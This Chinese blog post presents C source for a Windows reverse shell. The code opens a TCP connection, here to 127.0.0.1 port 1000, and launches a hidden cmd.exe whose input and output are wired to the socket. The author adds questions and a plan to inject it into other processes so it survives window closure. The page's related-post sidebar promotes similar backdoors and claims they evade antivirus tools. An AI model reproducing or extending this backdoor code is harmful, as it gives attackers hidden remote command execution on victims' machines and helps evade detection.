最简单的cmd_8.19

最新推荐文章于 2022-01-25 19:32:38 发布
最新推荐文章于 2022-01-25 19:32:38 发布
阅读量429 收藏
点赞数
文章标签: cmd socket null path include stream
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kakaxia6337/article/details/5825259
版权

#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")


int  cmdshell(SOCKET s)
{
 STARTUPINFO si;
 PROCESS_INFORMATION pi;
 GetStartupInfo(&si);//为什么把这句话注释掉,整个程序就只会显示main函数中的字符,而不会出现cmdshell???

 si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
 si.wShowWindow=SW_HIDE;  //这个参数可以变化!!!自己试试
 si.hStdInput=si.hStdOutput=si.hStdError=(void*)s; //(void*)s是什么意思?强制转换?

 char path[512];
 GetSystemDirectory(path,sizeof(path));
 strcat(path,"//cmd.exe");

 int rev;
 rev=CreateProcess(NULL,path,NULL,NULL,1,0,NULL,NULL,&si,&pi);

 WaitForSingleObject(pi.hProcess,INFINITE);
 CloseHandle(pi.hProcess);
 return 0;

}

int main(int argc,char* argv[])
{
 WSADATA wsaData;
 if ( 0 !=WSAStartup( MAKEWORD( 2, 2 ), &wsaData )) {
  return 1;
 } 
 if ( LOBYTE( wsaData.wVersion ) != 2 ||
  HIBYTE( wsaData.wVersion ) != 2 ) {
  WSACleanup( );
   return 1;
   }

 
 SOCKET s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
 
 if (INVALID_SOCKET==s)
 {
  printf("Socket is error!/n");
  WSACleanup();
  return 1;
 }
 
 sockaddr_in sAddr;
 sAddr.sin_family=AF_INET;
 sAddr.sin_port=htons(1000);
 sAddr.sin_addr.S_un.S_addr= inet_addr("127.0.0.1");
 
 int rev=connect(s,(SOCKADDR*) &sAddr,sizeof(sAddr));
 if (SOCKET_ERROR==rev)
 {
  printf("Connect is error!/n");
  closesocket(s);
  WSACleanup();
  return 1;
 }
 
 char buf[512]="欢迎使用这个小东西!/n";
 rev=send(s,buf,strlen(buf),0);
 if (SOCKET_ERROR==rev)
 {
        printf("send() failed with error: %d/n", WSAGetLastError());
       closesocket(s);
        WSACleanup();
        return 1;
 }
 
  cmdshell(s);

 closesocket(s);
 WSACleanup(); //加了这两句,窗口退出的时候会自动关闭窗口!!
 
 return 0;
 
}

//为什么将cmdshell与main顺序换一下,就会有乱码产生?????

 

另外,在解决上面问题的基础上,这个代码目前还需要做如下的完善:要插入其他进程,否则,1:直接执行这个程序后关闭窗口,2:在命令行下运行这个程序,然后退出命令行。在上面两种情况下,这个程序会自己主动结束,下一步要搞定这个东西。

kakaxia6337
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
零管道
maoxing63570的专栏
10-31 819
#include #include #include #pragma comment(lib,"WS2_32.lib") unsigned WINAPI ThreadProc(LPVOID lparam) { SOCKET sock=(SOCKET)lparam; STARTUPINFO startinfo={0}; PROCESS_INFORMATION pi={0}; s
安全之路 —— 零管道反向连接后门解析
雨者
03-05 1590
简介 根据前面两篇Blog介绍的双管道后门和单管道后门,他们的特点是一定需要建立管道以便进行进程间通信。但是能不能不需要管道呢?答案是可以的,这里需要借鉴重叠IO的思想,将程序中的socket函数替换成支持重叠IO的WSASocket函数。 核心知识点 si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sSock; 即将Socket...
MFC 执行CMD命令 利用管道技术读取输出内容
wtguo1022的博客
07-02 2980
https://blog.csdn.net/qq61394323/article/details/39829631MFC执行CMD命令并获得其返回信息源代码MFC执行CMD命令并获得其返回值。原理是利用管道技术,创建一个进程执行cmd命令,并将其返回信息存入管道中,再读出管道中的命令即可。以下是我封装的一个函数,参数是要执行的CMD命令,多个命令之间用“&amp;”号隔开,函数的返回值就是执行命令...
技术讨论关于零管道CMD后门
冷风
08-08 2812
冷风草草细说下零管道 关注.........μρ2ц清风这个不光过卡巴了,,,基本上所有主动防御都过!!包口SSM,微点,,,夕草hot patching.μρ2ц清风对啊..冷风用socket直接替换输入输出的handle,可以实现零管道sulwan颠覆核心编程啊.μρ2ц清风反正我是用零管道的..幻影    si.hStdInput=hrp1;     si.hStdOutput=hwp2;幻
Lumerical_FDTD_Solutions_8.19.1584_Win64
07-10
本人学习纳米技术时找到的FDTD软件资源。 FDTD Solutions软件由加拿大Lumerical Solutions公司出品。该公司成立于2003年,总部位于加拿大温哥华。用户用该公司软件已发表大量高影响因子论文,并被许多国际著名大公司...
快递员揽派_8.19.9.apk
03-29
快递员揽派_8.19.9.apk
Alibaba-Dragonwell-Extended-8.19.20-x64-windows.zip
06-12
用户可以通过解压“Alibaba-Dragonwell-Extended-8.19.20-x64-windows.zip”文件,将“dragonwell-8.19.20”目录放置到适当位置,并配置系统环境变量(如JAVA_HOME)来启用龙井JDK。之后,用户可以使用`java -...
Windowsclean_V8.19破解版
10-28
Windows更新清理工具,已包含Windows更新清理工具帮助文档 6-19修订.pdf
Alibaba-Dragonwell-Standard-8.18.19-x64-windows.zip
02-28
《Alibaba Dragonwell:打造高性能的Java开发环境》 Alibaba Dragonwell,作为阿里巴巴推出的免费OpenJDK发行版,是企业级开发与运行Java应用程序的重要选择。它为开发者提供了稳定、高效且具备长期支持的Java运行...
Windows进程间通信 匿名管道 共享内存 示例:MFC输入cmd命令 cmd执行后输出到MFC界面 不显示CMD窗口
chenhao0568的专栏
01-25 2230
一、共享内存 管 道(Pipe)实际是用于进程间通信的一段共享内存。把管道想想成共享内存比较好理解。 示例:把DOS进程上的内容通过管道技术输出到一个MFC应用程序的CEdit控件中。 CreeatePipe(&hRead,&hWrite,&sa,0); //创建pipe内核对象,设置好hRead,hWrite. 管道2:cmd进程输入重定向到hReadChild从这里读,把MFC命令dir写到hWriteParent里,cmd进程会执行这个命令。 管道1:cmd进程输出重
CreateProcess 输入输出重定向到文件
ey
12-17 1700
运行Demo.java,传a、b值,把输出来的计算结果写到TXT文件中。 Demo.java: import java.util.Scanner; public class Demo { public static void main(String[] args) { Scanner in = new Scanner(System.in); i
如何在父进程中读取子(外部)进程的标准输出和标准错误输出结果
编程语言小筑
02-20 670
最近接手一个小项目,要求使用谷歌的aapt.exe获取apk软件包中的信息。依稀记得去年年中时,有个同事也问过我如何获取被调用进程的输出结果,当时还研究了一番,只是没有做整理。今天花点时间,将该方法整理成文。(转载请指明出于breaksoftware的csdn博客) 在信息化非常发达的今天,可能已经过了江湖“武侠”草莽的时代。仅凭一己之力想完成惊人的创举,可谓难上加难。于是社会分...
反向连接打开cmdshell
天元喜羊羊的博客
07-22 1079
源代码: #include #include #pragma comment(lib,"Ws2_32") #define LISTEN_PORT 9090 int main() { WSADATA ws; SOCKET listenFD; int ret; WSAStartup(MAKEWORD(2, 2), &ws); listenFD = WSASocket(AF_IN
重定位本进程的标准输出(非子进程)
weixin_34054931的博客
11-09 99
PS:标准输入/标准错误 ,参考这个来弄吧。 环境:Win7(32位/64位),VC6 1、 1 int main() 2 { 3 printf("*stdin : %x\n", *stdin); 4 printf("*stdout : %x\n", *stdout); 5 printf("*stderr : %x\n", *stde...
VC 获取外部程序执行结果
pcsuite的专栏
04-01 5177
<br />VC上调用外部程序的方法大家应该很熟悉,比如ShellExecute,CreateProcess。<br />例子:<br />system("D://adb.exe devices >c://temp.txt");<br /> <br />ShellExecute(NULL,"open","adb.exe","devices","D://",SW_SHOW);<br /> <br />STARTUPINFO si;<br />PROCESS_INFORMATION pi;<br />Creat
udp分片报文pcap文件
最新发布
07-18
udp分片报文pcap文件:64kudp大包分成每片658字节总计100片
计算机教学导案.doc
07-18
计算机
lumerical_fdtd_solutions_8.19.1584_win64
07-26
lumerical_fdtd_solutions_8.19.1584_win64是一款用于电磁场仿真的软件。它基于有限差分时域(FDTD)方法,能够准确地解决电磁场在二维和三维空间中的传播和相互作用问题。 该软件具有用户友好的界面,使得用户能够...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值